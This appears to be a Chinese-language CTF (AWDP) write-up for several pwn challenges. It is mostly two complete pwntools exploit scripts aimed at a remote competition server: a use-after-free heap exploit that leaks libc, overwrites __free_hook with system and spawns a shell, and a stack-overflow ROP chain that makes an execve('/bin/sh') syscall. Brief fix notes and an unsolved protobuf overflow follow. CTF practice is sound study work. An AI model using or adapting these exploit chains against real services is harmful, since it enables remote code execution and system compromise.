AWDP的形式,FIX 的活都让队内的逆向✌去修了。
[PWN] note
简单的UAF,并且增删改查功能齐全,ubuntu20.04。但抽象的是修了十几次都没修好🤡,摆了
#!/usr/bin/python3
from pwn import *
file = "./pwn"
elf = ELF(file, checksec=False)
libc = elf.libc
context.binary = elf
context.log_level = "DEBUG"
context.terminal = ["tmux", "splitw", "-h"]
p = elf.process()
ip, port = "39.106.48.123", 40019
p = remote(ip, port)
def Menu(choice):
p.sendlineafter(b"5. exit", str(choice).encode())
def New(sz, cont):
Menu(1)
p.sendlineafter(b"The size of your content: ", str(sz).encode())
p.sendlineafter(b"content: ", cont)
def Edit(idx, sz, cont):
Menu(2)
p.sendlineafter(b"index:", str(idx).encode())
p.sendafter(b"The size of your content:", str(sz).encode())
p.sendafter(b"Content:", cont)
def Delete(idx):
Menu(3)
p.sendlineafter(b"index: ", str(idx).encode())
def Show(idx):
Menu(4)
p.sendlineafter(b"index: ", str(idx).encode())
def uu64():
return u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
New(0x70, b'/bin/sh\x00')
New(0x500, b'a')
New(0x70, b'b')
New(0x70, b"c")
New(0x70, b'd')
Delete(1)
Show(1)
leak = uu64()
libc.address = leak - 0x1ecbe0
log.success("libc => %#X" % libc.address)
New(0x500, b'e')
Delete(2)
Delete(3)
Delete(4)
Edit(4, 0x8, p64(libc.sym.__free_hook))
New(0x70, b"a") # 7
New(0x70, p64(libc.sym.system)) # 8
# gdb.attach(p)
Delete(0)
p.interactive()
[PWN] go-note
edit功能存在栈溢出
溢出长度经过动态调试获得,0x40后就可以覆盖返回地址,然后使用syscall获得shell。调试了很久,发现本地和远程机器不一样,最后在20.04调通,需要用ret调整一下栈。
#!/usr/bin/python3
from pwn import *
file = "note"
elf = ELF(file, checksec=False)
libc = elf.libc
context.binary = elf
context.log_level = "INFO"
context.terminal = ["tmux", "splitw", "-h"]
p = elf.process()
ip, port = "39.106.48.123", 45369
p = remote(ip, port)
def Menu(choice):
p.sendlineafter(b"Your choice > ", str(choice).encode())
def New(cont):
Menu(1)
p.sendlineafter(b"Please input note content:", cont)
def Delete(idx, cont):
Menu(2)
p.sendlineafter(b"Please input note id:", str(idx).encode())
def Edit(idx, cont):
Menu(3)
p.sendlineafter(b"Please input note id:", str(idx).encode())
p.sendlineafter(b"Please input new content:", cont)
def Show(idx):
Menu(4)
p.sendlineafter(b"Please input note id:", str(idx).encode())
def uu64():
return u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
# sleep(1)
New(b"a")
# sleep(1)
New(b"b")
# sleep(1)
New(b"c")
# gdb.attach(p, "b *0x47F41D")
# b *0x47F41D
"""
0x0000000000404408 : pop rax ; pop rbp ; ret
0x0000000000404541 : pop rbx ; ret
0x000000000047a8fa : pop rdx ; ret
0x0000000000401032 : ret
0x000000000040316c : syscall
0x0000000000462946 : pop rdi ; setne al ; ret
0x0000000000411069 : mov rsi, rcx ; add rsp, 0x10 ; pop rbp ; ret
0x0000000000430887 : pop rcx ; adc bl, al ; xor eax, eax ; xor ebx, ebx ; ret
0x000000000044a29f : mov rdi, rbx ; add rsp, 0x18 ; pop rbp ; ret
0x000000000040453f : add al, ch ; pop rbx ; ret
"""
ret = 0x0000000000401032
syscall = 0x000000000040316C
pop_rbx_ret = 0x000000000040453F
mov_rdi_rbx_pop_ret = 0x000000000044A29F
pop_rdi_ret = 0x0000000000462946
pop_rsi_ret = 0x000000000041CAD3
pop_rdx_ret = 0x000000000047A8FA
pop_rax_ret = 0x0000000000404408
pop_rcx_ret = 0x0000000000430887
mov_rsi_rcx = 0x0000000000411069
sh_addr = 0x526EA0
# execve('/bin/sh' 0 0)
# b *0x47F41D
payload = flat(
[
# read(0, addr, 0x8)
pop_rdx_ret,
0x10,
pop_rcx_ret,
sh_addr,
mov_rsi_rcx,
0, ret, ret, ret,
pop_rdi_ret,
0,
pop_rax_ret,
0,
0x1,
syscall,
# execve('/bin/sh', 0, 0)
pop_rcx_ret,
0,
mov_rsi_rcx,
0,
pop_rdx_ret,
0x0,
pop_rdi_ret,
sh_addr,
pop_rdx_ret,
0x0,
pop_rax_ret,
59,
0x1,
syscall,
]
)
Edit(3, b"a" * 0x40 + payload)
# sleep(1)
p.sendline(b"/bin/sh\x00")
# sleep(1)
p.sendline("/bin/sh\x00")
p.interactive()
FIX: 将memcpy的第三个参数改为0x200就行
[PWN] protoverflow
漏洞点是memcpy没有长度校验,缓冲区溢出。
相关的符号:message.proto
不能上网,不会protobuf🤡相关的内容
还有一题 starlink 0解题,看不懂。
总结:没什么经验,应该先把漏洞给修了,而不是死磕一题。